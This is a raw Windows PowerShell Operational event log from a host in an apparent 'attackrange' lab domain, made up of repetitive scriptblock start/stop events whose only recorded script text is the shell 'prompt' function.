RecordNumber=1469228
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469227
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469226
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469225
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469224
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469223
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469222
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469221
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469220
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469219
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469218
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469217
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469216
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469215
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469214
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469213
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469212
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469211
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469210
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469209
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469208
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469207
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469206
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469205
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469204
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469203
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469202
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469201
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469200
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469199
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469198
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469197
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469196
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469195
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469329
Keywords=None
Message=Started invocation of ScriptBlock ID: a85bed97-9bbb-4097-beff-9d8cef80286e
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469328
Keywords=None
Message=Completed invocation of ScriptBlock ID: c4b284fb-e393-4c1a-8b6e-49ef7b48fb6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469327
Keywords=None
Message=Completed invocation of ScriptBlock ID: 96c9fa28-5752-4028-87a6-893baac490be
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469326
Keywords=None
Message=Started invocation of ScriptBlock ID: 96c9fa28-5752-4028-87a6-893baac490be
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469325
Keywords=None
Message=Started invocation of ScriptBlock ID: c4b284fb-e393-4c1a-8b6e-49ef7b48fb6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1469324
Keywords=None
Message=Creating Scriptblock text (1 of 1):
prompt

ScriptBlock ID: c4b284fb-e393-4c1a-8b6e-49ef7b48fb6a
Path:
06/15/2021 05:00:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469323
Keywords=None
Message=Completed invocation of ScriptBlock ID: ca06aa1b-177a-4689-9498-1195c0905ec9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469322
Keywords=None
Message=Started invocation of ScriptBlock ID: ca06aa1b-177a-4689-9498-1195c0905ec9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469321
Keywords=None
Message=Completed invocation of ScriptBlock ID: fa43fc60-cc8d-4d84-9337-5f3a3a3dbea0
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:22 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469336
Keywords=None
Message=Started invocation of ScriptBlock ID: a85bed97-9bbb-4097-beff-9d8cef80286e
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:22 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469335
Keywords=None
Message=Completed invocation of ScriptBlock ID: 219d2b08-afc5-4827-b5af-fbe35161133f
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:22 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469334
Keywords=None
Message=Completed invocation of ScriptBlock ID: 96c9fa28-5752-4028-87a6-893baac490be
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:22 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469333
Keywords=None
Message=Started invocation of ScriptBlock ID: 96c9fa28-5752-4028-87a6-893baac490be
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:22 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469332
Keywords=None
Message=Started invocation of ScriptBlock ID: 219d2b08-afc5-4827-b5af-fbe35161133f
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:22 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1469331
Keywords=None
Message=Creating Scriptblock text (1 of 1):
prompt

ScriptBlock ID: 219d2b08-afc5-4827-b5af-fbe35161133f
Path:
06/15/2021 05:00:22 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469330
Keywords=None
Message=Completed invocation of ScriptBlock ID: a85bed97-9bbb-4097-beff-9d8cef80286e
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:29 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469343
Keywords=None
Message=Started invocation of ScriptBlock ID: a85bed97-9bbb-4097-beff-9d8cef80286e
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:29 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469342
Keywords=None
Message=Completed invocation of ScriptBlock ID: 2101f464-6637-4080-a55b-d8b5808e03ca
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:29 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469341
Keywords=None
Message=Completed invocation of ScriptBlock ID: 96c9fa28-5752-4028-87a6-893baac490be
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:29 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469340
Keywords=None
Message=Started invocation of ScriptBlock ID: 96c9fa28-5752-4028-87a6-893baac490be
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:29 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469339
Keywords=None
Message=Started invocation of ScriptBlock ID: 2101f464-6637-4080-a55b-d8b5808e03ca
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:29 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1469338
Keywords=None
Message=Creating Scriptblock text (1 of 1):
prompt

ScriptBlock ID: 2101f464-6637-4080-a55b-d8b5808e03ca
Path:
06/15/2021 05:00:29 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
